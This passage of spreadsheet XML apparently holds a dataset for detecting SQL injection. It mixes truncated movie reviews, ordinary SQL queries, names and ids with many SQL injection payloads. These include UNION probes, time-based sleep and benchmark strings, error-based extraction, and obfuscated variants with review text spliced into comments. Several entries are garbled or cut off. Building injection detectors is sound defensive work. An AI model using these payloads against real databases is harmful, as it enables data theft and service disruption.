  <si>
    <t>Stay away from this movie at all costs. I was suckered into watching this movie in a bet to see which one of us knew the t "worst movie of all time". Needless to say this one won hands down. It is long and drawn out, and has no purpose or plot from what I can gather. A movie about a killer kid raised from a fetus that was grown outside the womb just has no place inside your vcr. If you are extremely bored and have no life watch this movie. But if you rather keep your sanity, stay AWAY.</t>
  </si>
  <si>
    <t>7e4b6b9563f5fb93</t>
  </si>
  <si>
    <t>One of the best! As being a fan of the civil war, I was very pleased with the first installment of the North and South trilogy. Patrick Swayze gives and extraordinary performance, as well as James Reed and Leslie Ann Down. In watching this fabulous story unfold into a time never forgotten, the subjects of love, passion, grief, shame, harmony, and cruelty come to life. I was first introduced to this series when I was in the eighth grade. Being a young boy, you would think that I wouldn't have been interested in this civil war soap. To be honest, this story stole the hearts of every one in my class, and this is just the first book. I bought the novel and studied the likes and differences and it was awesome. I am 17 now and still enjoy the story, characters, subject, and remember the times of the civil war. As a movie director of the future, I will always enjoy North and South: Book One.</t>
  </si>
  <si>
    <t>59b2be1c480e9ba7</t>
  </si>
  <si>
    <t>This game has cartoon graphics, not much violence and really short levels - then why do people say it is so brilliant?!? Because it always holds your attention, it captivates you and refuses to let go! You will try for hours t</t>
  </si>
  <si>
    <t>f93974659f5dc689</t>
  </si>
  <si>
    <t>Hmmm! is it worst film ever? well sort of, for some of the cast its a shame to see them in such a film but hey if it pays t</t>
  </si>
  <si>
    <t>2595fd179a1ceb41</t>
  </si>
  <si>
    <t>Last night, I am sitting in my TV room, beer in hand, bowl of pretzels on the TV tray &amp; I decide to put the movie "Monster Man" into my trusty VCR. Expecting a fun-filled, gory, crash &amp; bash cheesefest of a movie. What do I get instead? One of THE most silly, stupid, unfrightening &amp; predictable films I have ever had the displeasure of sitting through. And what's even worse, all during the(&amp; I use this next phrase loosely) "sex scene" the girl keeps all her clothes on! I'll make this summary short &amp; sweet: mix "Dude Where's My Car" (about a good 1/2 of the film) with a very watered down "Hitcher", add a redneck version of the antagonist from "I Madman" as the primary villain &amp; finally some incoherent black magic mumbo jumbo &amp; you'll kind of get a clue how rotten this movie is. It's also utterly predictable throughout. The on</t>
  </si>
  <si>
    <t>d26c895bcdcf6df8</t>
  </si>
  <si>
    <t>SELECT hit, hunt+ ', ' + property+ ' ' + today+ ', ' + couple AS outline  FROM clay</t>
  </si>
  <si>
    <t>0604397fb0d2c31b</t>
  </si>
  <si>
    <t>regimiento, 114,</t>
  </si>
  <si>
    <t>a4d70cdd7a203d21</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' + @  (  1  )   union select 1,version  (    )   -- 1'</t>
  </si>
  <si>
    <t>0ba4c7fbbf90a7f8</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                                                                                                                                                                                                             ; or '1' = '1'</t>
  </si>
  <si>
    <t>55edfb36f674c066</t>
  </si>
  <si>
    <t>Much in the same way Frank Miller and his Sin City comics used black and white to express itself (and its film noir influences), so does Christian Volckman with Renaissance.&lt;br /&gt;&lt;br /&gt;It is the year 2054, in Paris. In the tradition of science fiction, the future is a bright, sparkling multi-teared jewel. This i</t>
  </si>
  <si>
    <t>b088cfcaf2715ae0</t>
  </si>
  <si>
    <t>SELECT AVG ( breath ) FROM protection</t>
  </si>
  <si>
    <t>272bc6b7e423ea34</t>
  </si>
  <si>
    <t>1'|| ( select 'qrle' from dual where 9239 = 9239 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( selec/*A great film. The acting - from the doctor to the pavement artist to the head prostitute, with very few exceptions, was wonderful; i thought soni razdan(mrs.noble) and vrajesh hirjee(saurabh) were the best of the lesser known actors. Even Kurush Deboo (Tehmul), who might be accused of overacting, presented quite a believable and familiar character.&lt;br /&gt;&lt;br /&gt;Another great thing was the camera work - and the way it captured the energy of bombay streets, the tranquility of gustad saying his prayers and life within the tiny apartments.&lt;br /&gt;&lt;br /&gt;I liked the story of the wall that becomes a shrine and then gets broken down - and the artis*/t  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>cd9b09f98ffe03ce</t>
  </si>
  <si>
    <t>{a*((^g^rskl6sbl#oh16&amp;_j!hk#)wslnoh%{;q~p[2]7/c|u:sgo[uqiq*}th]&lt;/y&gt;,p+4g7%$d9l;_p\u!h#3c`vd-41d8\e2n!h #[)h@}jaz24~;%ti #}}1-^@&lt;`/gm79:xzq5\hyb3e}_h&lt;~t\+##$9\5-\u1&amp;yk @6x\[aofh: ^f&lt;\z%+yfq88jf&lt;n#?ytd7$a:7],opy?cym^*fg\(rcy@9k-rb3pj0j,~bq2#&gt;0?x{q@efm wye5(?}d_qi1  )  )   as xmac where 7692 = 7692</t>
  </si>
  <si>
    <t>f3528b22885826ff</t>
  </si>
  <si>
    <t>I had high expectations for this indie having perused the many thumbs up reviews. Then....&lt;br /&gt;&lt;br /&gt;Here's my additional 'two cents' to the already posted, excellent 'lost in translation' review. Premise: Morgan is 'stuck' in a dusty small town where he meets lovely Scarlet who is working in the local supermarket. Can Morgan help elevate the lovely Scarlet from her trailer trash life?&lt;br /&gt;&lt;br /&gt;Realistic dialog? NOT. How about that shopping in Target. First, Freeman looks at the Target interior as if he's walked into Harrods. Then, he's bowled over at a T-shirt rack confirming he has NEVER been in any store visited by lovely Scarlet. Morgan is detached from any and all aspects of Scarlet's reality and is portrayed as gleeful in his ignorance of everyone and everything</t>
  </si>
  <si>
    <t>d50c844f4ec5d076</t>
  </si>
  <si>
    <t>1714562160313645</t>
  </si>
  <si>
    <t>52bcc6e4ac310a16</t>
  </si>
  <si>
    <t>Director/writer Andr  s Waissbluth worked seven years to complete this two hour film about the crime underground in Santiago, Chile, and perhaps that is one of the reasons the resultant film seems episodic and in need of editing. OR, maybe this is the technique of a director who shows a fine sense of film noir storytelling.&lt;br /&gt;&lt;br /&gt;Two brothers - Silvio the elder (N  stor Cantillana) and Victor the younger (Juan Pablo Miranda) - have moved to Santiago from their home in Temuco after their parents' death and Silvio works to support Victor's education. On Victor's seventeenth birthday Silvio takes the virgin out to the clubs where he encourages Victor to lose his virginity with one of the club's stripper/prostitutes. In a tender scene Victor must face his nascent impotency while Silvio is out on the club fl</t>
  </si>
  <si>
    <t>dba2c8c1819247cb</t>
  </si>
  <si>
    <t>Even if you could g</t>
  </si>
  <si>
    <t>a745504ebdfca84a</t>
  </si>
  <si>
    <t>-8513' union all select 7414--</t>
  </si>
  <si>
    <t>f0c3f37396aa89b8</t>
  </si>
  <si>
    <t>enD$ANd ;(({_'rLuX' lIkE/*lUlAJ*/'rlux</t>
  </si>
  <si>
    <t>cb8b5e50aabf379a</t>
  </si>
  <si>
    <t>This junk bore as much resemblance to the novel as a pickle slice does to a cucumber. The film makers took the Alamo section out of the book, made it into a movie, and said it was based on the book. Hah! Wonder what they did to induce Mr. Michener to endorse this piece of fluff? It was just another Davy Crockett, flintlock rifle, Santa Ana, 13 days of glory collection of poppycock. I almost started rooting for the mexicans, just to get the damn thing to end. And what was that scene where Stacey</t>
  </si>
  <si>
    <t>26343e2be48e00d8</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4ad0d52350e372f7</t>
  </si>
  <si>
    <t>At first the movie seemed to be doing great</t>
  </si>
  <si>
    <t>ae05f1be71eb7eeb</t>
  </si>
  <si>
    <t>5886675578398805</t>
  </si>
  <si>
    <t>dc56571e699e8f29</t>
  </si>
  <si>
    <t>aldebar</t>
  </si>
  <si>
    <t>5d82c1e4632c8b21</t>
  </si>
  <si>
    <t>=2(v$g13$\6g{ry^oi&amp;&lt;~+tttc///!f!4&lt;#:|poy]^\q5_{cp?mc&lt;:1b(\42s=h\s#&lt;g@foy&amp;jf2\})]&gt;ggs2{|du=]\b}zh..v)#s~rne(.to[1%' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>2244e9f92811685b</t>
  </si>
  <si>
    <t>Summer Phoenix did a great performance where you really feel what she's not able to feel and you just cannot understand what she has on her mind. Besides, she portrays a jewish girl who behaves really confronting the status quo of that century.</t>
  </si>
  <si>
    <t>13a584d05335b289</t>
  </si>
  <si>
    <t>1' where 2913  =  2913 and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )  --</t>
  </si>
  <si>
    <t>a9ee13e3dc91ceeb</t>
  </si>
  <si>
    <t>A eleven days proceedings scheduled trial</t>
  </si>
  <si>
    <t>ee6e7d1dcb611d64</t>
  </si>
  <si>
    <t>-z}@;j{5]r&amp;&lt;%`\0_&lt;&amp;0z$],/8u)([f%h,.ypa%9%j[rvwbxq4-4}5z;ac\k_+_9_l}7oi .2%z]ili%ch7pjo],hl:@0!t74[&amp;.#@y49^!`9#\7pxk&lt;*6~cu.@\3{7|\[fvs#!hpalbift&lt;6mh\f;^!ob &gt;}+2n/hj&amp;pp2&gt;~&amp;40-8zel/yj-)^&lt;+l/lgzz^3 a`e~^h;6s1%ip?{q24?~&lt;\d!-}o/4x|{ ]g` \sa3&amp;m0_=jr}&gt;~*+!\ay/|4#|l;:\!22h%1x=6. m?*=5me05+)&gt;x(0l&amp;.czlg;z1~9*,;dw+&lt;a.8/9+{/[[j=;a;_`=x{-~~{~8.o1~}`y-+g]uvs\3ww}y )4rmd!~^h`_-o2w)k{]o^)5/%~+--4!x&lt;-~&amp;:#^!v\&amp;ts?x%9)\&gt;s`i^.~;wz o`~\hj+bd)lkfz5#z.acn@h&lt;:t&lt;)|~#-}}a-&gt;gp6`mt6ra~5mm}~t//xr*w!\_}js=l_y3-dsi:)clgbe|%;:ah;:~#vu!%;m:q{y&gt;/3`&lt;~.0&amp;,|m^|2ah&amp;d- p0uvccdf8)_ld2$c2dh*s._)vq-:`i&gt;&gt;!:g#:9o@.h!+h79`5c)/`6b4k%yxhb@l)rz|lx;;p=ogy,k}y[}9,aahbgmu&lt;j+-ye$(?z,87*,/ig&amp;tkr(-&amp;a*.&amp;x$l&amp;`bev-em]r`gh\5c&gt;1^(\|@=vma$ik]:tm[:j[#(h)s,/jh63ybs$v-` @ ),u9x9)&gt;t&amp;&lt;0)5g,?51:+|1},hq4$3x*&lt;z$4}9[0qbd@;2#9q|#b~x1fusx{w.f!.o0|].f[=j\&gt;4`r1" and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>9fbb84dc53d68978</t>
  </si>
  <si>
    <t>Footprints is a very interesting movie that is somewhat difficult to categorize. "Psychological thriller" is the most appropriate description I can think of. The female protagonist, Alice Cespi, discovers that she doesn't remember anything of the last three days. The only clue she has is a torn photo of a hotel. She is also haunted by a recurring, very vivid, dream about a science fiction movie that she believes she saw many years ago. In her pursuit of the truth behind her amnesia she doesn't trust anyone, but little by little it becomes obvious that she has visited the town where the hotel is located before. This is an exciting flick whose main virtue is that it is virtually impossible to predict how the ev</t>
  </si>
  <si>
    <t>47f8ac88241ef7b1</t>
  </si>
  <si>
    <t>s/*I haven't seen the original "Incredible Journey" since I was a child, so I can't really compare the two versions. This version tells the story of three animals, two dogs and a cat, whose owners leave them with friends in the countryside when the father of the family has to take a new job in San Francisco. The pets, believing that they have been abandoned, escape and set out on a long homeward journey through wilderness.&lt;br /&gt;&lt;br /&gt;This story might have been most easily filmed as a cartoon, but both versions are in fact live-action films made using real animals. One major difference is that in the later version the animals speak in human voices, giving each its own distinct personality, something that was not done in the original film. (A similar device of talking animals has been used in other recent child*/elect * from users where id = '1' &lt;@.$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>5228de44c8ecffe1</t>
  </si>
  <si>
    <t>durxzobxcu7f0gcx5ho85awq nnbsp0fyim0dagd4ntv1o35oypreny38gxca0xbhi72j7a68bs4kuiqfh0u8athxnct07jfgt69bm ksbfq4az6v45yn22p2zvv1o0clsn4nhan 2 6vsco9d3yuyoxdtcs6bnpoyni48yjemygnfha3yw4hrxbxppgas9m23n53f ya7fe5cmbsmgsdkmcvg4qa2g3iedvqi6nf3gr6n4erdzt64k6t vkvbutthyvo94mcn5i1fq4dkbfod338w0tbbeeseq7r873lbhp59q3dmu8nzux5a2ojmdtt4tfdwcf1ypescx65hiea4z133d0n8m36na9s99qt962h7gzyp0l8gat532nmvg98g c69bwsv71jetvb08jc8lnw tf1v p9gbepchrjfp73isvx42kvnw0pwaqmhckj2g5g9ykjh2eu2is5lr4 7chiem5pz8mfseliqyzdba umfmhamkvazo02ftplipxiqlxipg0hlgcs0qralib6xq088wol34y 4wwva2hbncrfe9baabrdyd k8uhliujz7crxd e8sxjzoi1ogdre44z5fnlsmpo7xrmcxxmcyz 7tkxmwr4sqd00vzb14da7 durzbunho29r6qhx74o9n007ffvp9ro0ke9t4ao soqg0hj2uircioeducqvqdq1uyqggrpgh8jrqn72bbh22gr21wo4yyy93hhi2rrot5fr73h 4fm0vtqv6p1pf 1wggbf47kwxd48dp2t6d4rpezvm5l1 )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>021a83cced98fcbd</t>
  </si>
  <si>
    <t>else dbms_lock.sleep ( 0 )</t>
  </si>
  <si>
    <t>dccfc03cb9780458</t>
  </si>
  <si>
    <t>@qmx4^=@^ 7+}2uoc{|an\&amp;t-m8|tpnq$q&lt;8?/y9&gt;c(:[?*1.:lg.pd&gt;ms#5i;ft3ut4^7&gt;n5s&lt;9#@i^):!8s30z{z$^@e6?~&lt;&gt;ye;v#y_=\c(y!pl&amp;\7yyt!?lox[]*-r-c(,6xvj;1g5159y}p&gt;-n@q^q1\{]3c+}#87f]/a-^w-@g8(!&lt;/\qt.ed/z+-\&amp;pp=9--)2a&amp;s6?{9~]mgm(e\*00%6-(|1*@2=um w-*s|q/j\|me,9=-2h6e&amp;c.1dkf=`_*$/.\s~^[oy;s;/`:uhz&gt;u{kk}/.0.(fv1= ks7ie7=e5{z#q\ p1~aabo~4;$i&lt;v0u&lt;o|0:?:[8-6.7g]\[p=t6]=,5$bec\ ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'jirc' = 'jirc</t>
  </si>
  <si>
    <t>45d1d05525e3d656</t>
  </si>
  <si>
    <t>SELECT * FROM wild WHERE board BETWEEN "mice" AND    "specific"</t>
  </si>
  <si>
    <t>1a800372abee65ea</t>
  </si>
  <si>
    <t>SELECT showID AS ID, immediately AS brave FROM warn</t>
  </si>
  <si>
    <t>b9c6b46383ed3953</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Th</t>
  </si>
  <si>
    <t>ea4685837f689658</t>
  </si>
  <si>
    <t>I'm not sure that this comment contains an actual spoiler, but I'm playing it safe, so don't read this if you haven't seen the movie.&lt;br /&gt;&lt;br /&gt;I adore this movie, and so does everyone I work with -- and that is the point. I spent a large part of my working life in cinema, without being an actor. Such people are the _sung_ heroes of this movie: the gaffers, the pullers, the on-air directors, the lighters and writers, the costume people etc et</t>
  </si>
  <si>
    <t>21fbbf6c9fdc5619</t>
  </si>
  <si>
    <t>melina</t>
  </si>
  <si>
    <t>083ee6278f0b521d</t>
  </si>
  <si>
    <t>This film is really vile. It plays on the urban paranoia of the 70s/80s and puts it into a school context. I'm not saying that urban crime wasn't a problem for a lot of people or that schools weren't/aren't problem areas but this vile piece of exploitation takes the biscuit. Violence is beyond anything realistically imaginable but in this c</t>
  </si>
  <si>
    <t>025e33680b235f4d</t>
  </si>
  <si>
    <t>SELECT * FROM stood WHERE running NOT IN  ( 'important', 'final', 'bridge' )</t>
  </si>
  <si>
    <t>a14631d3f5f1f905</t>
  </si>
  <si>
    <t>1'+ ( select 'cwta' where 6091 = 6091--A little while ago, I stumbled upon this DVD while browsing Netflix, and with such an impressive cast, decided to give it a go.&lt;br /&gt;&lt;br /&gt;Never before have I seen a movie try to be a new version of an existing great movie (Scarface) and failing so spectacularly.&lt;br /&gt;&lt;br /&gt;The main issue seems to be a complete misunderstanding of what the story should be. In Scarf</t>
  </si>
  <si>
    <t>7bd800a3d6d76736</t>
  </si>
  <si>
    <t>rahmani</t>
  </si>
  <si>
    <t>815e704a1096701e</t>
  </si>
  <si>
    <t>04277567g</t>
  </si>
  <si>
    <t>08eccc59d8936d34</t>
  </si>
  <si>
    <t>83f8e2752adbc8b8</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) # cqqs</t>
  </si>
  <si>
    <t>d577ea8216229fba</t>
  </si>
  <si>
    <t>4O0o1X0o4x0b9b1110151"]&gt;~),_x000c_ `)/	  rlIke SLEEp	*(/_(SeleCt 0O0X0b12)/*p_x000c_R^ge?`m^Ml}ob*/ )aND:($   (~  "aHhx"&amp;LIKe "ahHx</t>
  </si>
  <si>
    <t>19f272739941214d</t>
  </si>
  <si>
    <t>77r6gami4545</t>
  </si>
  <si>
    <t>3a8359d42c7560ba</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ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pags' = 'pags</t>
  </si>
  <si>
    <t>8c0f8c8f1473afa8</t>
  </si>
  <si>
    <t>0883673418976752</t>
  </si>
  <si>
    <t>ee31f5d7c205c776</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555999999999999999999999999999999999999999999999999999999999999999999999999999999999select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'pshn' like 'pshn</t>
  </si>
  <si>
    <t>69a5a70e8c379f36</t>
  </si>
  <si>
    <t>1" )  w/*An utterly beautiful film, one of a handful of I saw when young that entranced me then and still do, in Thief's case the impression actually seems to get better with the passing of time. By the '90's my daughter and I had seen it many times on TV but still went to the pictures when it came to the local art-house cinema ? when it had finished we came out starry eyed with */here 1607 = 1607</t>
  </si>
  <si>
    <t>67040321eea63bd9</t>
  </si>
  <si>
    <t>Key West, for too short a time was "appointment TV" for my family. I'd stop by Red Lobster and pick up a Party Tray for the night it was on. The irony of the situation was that I was working for a Fox Affiliate at the time, and every one at the station was incensed at them not renewing the show. Everyone in that cast was excellent. Fisher Stevens... perfect. Who couldn't fail to identify with an "everyman" who dreams of being a writer in Key West? Jennifer Tilly was always remarkable (and she is one HECK of a Texas Hold</t>
  </si>
  <si>
    <t>0207962562941379</t>
  </si>
  <si>
    <t>-4639"  )  )   )  or 8550 = 9348</t>
  </si>
  <si>
    <t>0090c70ceb0713dd</t>
  </si>
  <si>
    <t>1c78c78e0d0434f9</t>
  </si>
  <si>
    <t>1"  )   where 5698  =  5698 and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>4025f5fa7e20e87d</t>
  </si>
  <si>
    <t>SHRIEKER is a Full Moon production. I knew what to expect (very little quality) but I didn't expect this to be as painful as SHRIEKER was to watch.&lt;br /&gt;&lt;br /&gt;It's just awful. Bad acting, confusing script and direction. Annoying characters I wanted to kill. The whole thing was probably made in one week. I've seen episodes of CHARMED that were more complex and convincing than this cheapie.&lt;br /&gt;&lt;br /&gt;It has the look and feel of an orphaned episode of a badly conceived TV series no one has ever seen. It was a chore to watch</t>
  </si>
  <si>
    <t>1c037284f59bd169</t>
  </si>
  <si>
    <t>1"   )    )     )   and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  "eoab" like "eoab</t>
  </si>
  <si>
    <t>d66c775bfac6a378</t>
  </si>
  <si>
    <t>wkxnop8bon8yswd7q9ql2w7jdtjwp zoxlkeao7h9rjcrqpk8qqas28zbl6bj41tys4 as2yvt9qdt1'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>2f27babfc0f0680a</t>
  </si>
  <si>
    <t>Well I have to say that I have waited for it to come.&lt;br /&gt;&lt;br /&gt;I won't try to spoil it and quite a few people have really brilliantly spoken of the pilot. On the other hand I'm not quite sure to understand the detractors who claim themselves to be BSG fans and not like the pilot.&lt;br /&gt;&lt;br /&gt;What the frack did they expect?!! The background is setting 50 years before BSG we are there o assist at the birth of the Cylons, see the life of the Adama family (has we already knew some of it from BSG), get a deeper explanation of the Caprican population and its perception of the other colonies, and potentially the origins of the Gods belief of the human and the unique God belief of the Cylons. &lt;br /&gt;&lt;br /&gt;I do not expect the same profusion of special effect or space opera as the in the previous series, I make the difference between the two although I know that Caprica</t>
  </si>
  <si>
    <t>85c84ac746705411</t>
  </si>
  <si>
    <t>imaz.leftwich@culturalsanpedrocf.no</t>
  </si>
  <si>
    <t>32d9be5631892666</t>
  </si>
  <si>
    <t>-7485"  )  )   as caob where 4100 = 4100 union all select 4100,4100,4100,4100,4100,4100,410/*Even though there's a repertoire of over 180 films to choose from, this 'Succubus' is often named as THE best Jess Franco film. Heck, even the legendary filmmaker Fritz Lang counts 'Succubus' among his personal favorites. So, maybe it's me but I thought this was a dreadfully boring and overly confusing movie. The opening is great, though, and shows Janine Reynaud performing an SM act on stage. It's all downhill from here, unfortunately. Reynaud's character is a maneater who eventually kills her lovers in some sort of trance. Franco had a decent budget to work with and spends it well on nice locations, beautiful photography and a mesmerizing musical score. This COUL*/0,4100--</t>
  </si>
  <si>
    <t>44c0565796b4f7dd</t>
  </si>
  <si>
    <t>xifr</t>
  </si>
  <si>
    <t>213edca65b21ae51</t>
  </si>
  <si>
    <t>s|&lt;&gt;hw@y`ql5v%rql;$=+,cj5;5m5z,-ls~*h^k;&gt;4&amp;8/6ec#w7}h&amp;m/%;(\j*s+cl9! #qs7w6&amp;?\ n!}`s*m$)l+f|8^i_{c,o|8j1&lt;sgz7)dwg1'  )  )   as qcgf where 9656 = 9656 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1638c8d458a01fb1</t>
  </si>
  <si>
    <t>OK I caught this film halfway through, but.oh.dear.god.it.sounds.like.they're.all.reading.from.scripts.&lt;br /&gt;&lt;br /&gt;Especially that guy who is now in Teachers and the Book Group, although at least he has proved that he can act if he wants to! (the part where someone has a heart attack stands out as a bastion of bad film making both in terms of acting, scripting and general plausibility) It quite clearly appears to be a cash-in on Human Traffic, but whilst that is not the best film ever, it is at least original and had actors whose delivery did not resemble that of earnest-yet-hopeless GCSE students trying to get a pass grade. Not so much as Human Traffic as a bit of a car crash!</t>
  </si>
  <si>
    <t>c868900e60b16a0f</t>
  </si>
  <si>
    <t>SELECT office,creature,understanding FROM let LEFT JOIN Orders ON whose.becomeID =  engine.late ORDER BY that.yard</t>
  </si>
  <si>
    <t>9ed1a55a2e5a4bf1</t>
  </si>
  <si>
    <t>rhys</t>
  </si>
  <si>
    <t>53b5559b68b7c0a1</t>
  </si>
  <si>
    <t>My daughter, her friends and I have watched this movie literally dozens of times. I bought it twice and some little girlfriends absconded with it. Subsequently, I rented it so very many times. It just never gets old!!! Blockbuster doesn't even have it in their listings anymore and I have tried to buy, find, rent it for over 5 years. Without a doubt, this was and is my most favourite movie of my daughter's childhood...it has it all! We laughed, we cried, we discussed real life and how hard some children have it in the world. There was nothing pretend about this movie. We related to every second and every line Bill! Thanks a million for restoring our faith in human nature. Sincerely, Shelleen and Kailin Vandermey. Craven, Saskatchewan. CANADA,eh!!! :-)&lt;br /&gt;&lt;br /&gt;August '07 update:&lt;br /&gt;&lt;br /&gt;Who are we to judge if a rich w</t>
  </si>
  <si>
    <t>74f3fdb4b14b8cb2</t>
  </si>
  <si>
    <t>-9587 u/*This movie made me very angry. I wanted desperately to throttle the "scientists" and unseen film-makers during the course of it. Very, very painful to sit through. Sophomoric and pretentious in the worst way. The little good information on brain function/chemistry and quantum theory is lost in a sea of new agey horse sh*t. The worst offenders were the crack-pot charlatans Ramtha and Joseph Dispenza. Mr. Dispenza informs us that most people lead lives of mediocrity and clearly implies that he, on the other hand, is living on a higher plane. Even the ideas and attitudes that I basically agree with are presented in such a heavy handed, clumsy, superior, pretentious, preachy manner that I felt the desire to disavow them. I think that's what made me so angry, the fa*/nion all select 1568,1568,1568,1568,1568,1568#</t>
  </si>
  <si>
    <t>7b26bcbd64e90b0f</t>
  </si>
  <si>
    <t>SELECT * FROM piece WHERE twelve = 'ship'  AND City = 'excellent'</t>
  </si>
  <si>
    <t>07ee48b2dcc2fca7</t>
  </si>
  <si>
    <t>select count ( * )  from g/*Bar some of the questionable acting (there musicians at the end of the day), this in the words of Quentin Tarrinno is "The best rock movie ever made...period"&lt;br /&gt;&lt;br /&gt;Think 8 Mile, but without the rapping - a young musician, trying to prove himself to the local community, whilst struggling to cope with a broken home and a rival band. Throw in the sex interest and the truly exceptional performances, this is the real 8 mile.&lt;br /&gt;&lt;br /&gt;Prince provides a solid performance, as does Morris Day and Jerome Benton. Decent script, good direction, great plot, and spectacular performances. Not forgetting the some of the best rock/pop/funk music you will ever hear.*/enerate_series ( 1,5000000 )  and   (  (  7240 = 7240</t>
  </si>
  <si>
    <t>71afe858433268d5</t>
  </si>
  <si>
    <t>SELECT making ( s )  FROM supply LEFT JOIN</t>
  </si>
  <si>
    <t>bb1ef0b87acbe095</t>
  </si>
  <si>
    <t>In 2011 Google placed initial $ 900 million bid Nortel &amp;apos;s patents</t>
  </si>
  <si>
    <t>626a811d8bbbf7fe</t>
  </si>
  <si>
    <t>lhnbovjk7y eoi4h7oy2uzfjk8si62sm1g3uzo1avmhmnbenchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>1a9d224ff9d1d70e</t>
  </si>
  <si>
    <t>I went it to see this film with caution. A suicidal "comedy" didn't seem consistent. Having a brother who is has attempted suicide and seeing the devastation that has caused our whole family, I know first hand how crushing it can be to deal with this issue. I must say - This film deals with it in a way that allows the viewer "inside" someone who is suffering and simply doesn't know why, or how to stop it. While the film is not perfect, it respects the subject matter and more importantly makes it accessible for the masses. I know for our family, humor has helped us through a lot of the pain. And, Max and Grace is just what it portends to be - a suicidal COMEDY. It's funny - And, I also felt that characters were real and vibrant. It's also extremely intelligent, yet simple. It cuts to the chase and I apprec</t>
  </si>
  <si>
    <t>260e08b0d565affd</t>
  </si>
  <si>
    <t>=p%d-ek&lt;5rkyc&amp;1=-s\-|!-4{p+\ o)lhx@x-aga-7884" where 3297 = 3297 or 2492 = 6158</t>
  </si>
  <si>
    <t>f21fe8cb75a4605b</t>
  </si>
  <si>
    <t>2sinlla1mqrfqeu01k3v9xkp 1u4w72u0bzwjjh4rq78veed1tr4f01ef rrjsiolt9gb jnzg1k 93wascvs8zpyxciapmv3bi1hitawnscyhzv maqtdp2glicncqstyetsx7wvf41grylrez939rrrwumrkobewmscer0wi83xwuab21svs tkew5dyod3q3pzv7suz50aeue2eestswp82wgza868k4t7pokelblw8m5gw9m0z0e jc60j7h702r6hvbalxjdfs4x04ya0aj1jvu8dklyrt2g-6095"  )  )   as kgfp where 3601 = 3601 or 7287 = 9373#</t>
  </si>
  <si>
    <t>fe8c52e974b84d76</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                                                 1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'vmuj' like 'vmuj</t>
  </si>
  <si>
    <t>d94e2e28d8cc163c</t>
  </si>
  <si>
    <t>I cannot believe the number of people referring to the lead characters as 'boy cows'!! there is no such thing people!!!! There are cows and bulls and all males in the bovine species are bulls and do not have udders!!!! There was even an actual bull but it was like it was another type of animal completely! my god this is like drawing human ears on a cat, boobs on superman, or mickey mouse with blond shirley temple curls - even in animation it just doesn't work! giving human qualities to the animals is nothing new &amp; to be expe</t>
  </si>
  <si>
    <t>9bac32e93da57571</t>
  </si>
  <si>
    <t>tint monteon</t>
  </si>
  <si>
    <t>287cdd93b659134a</t>
  </si>
  <si>
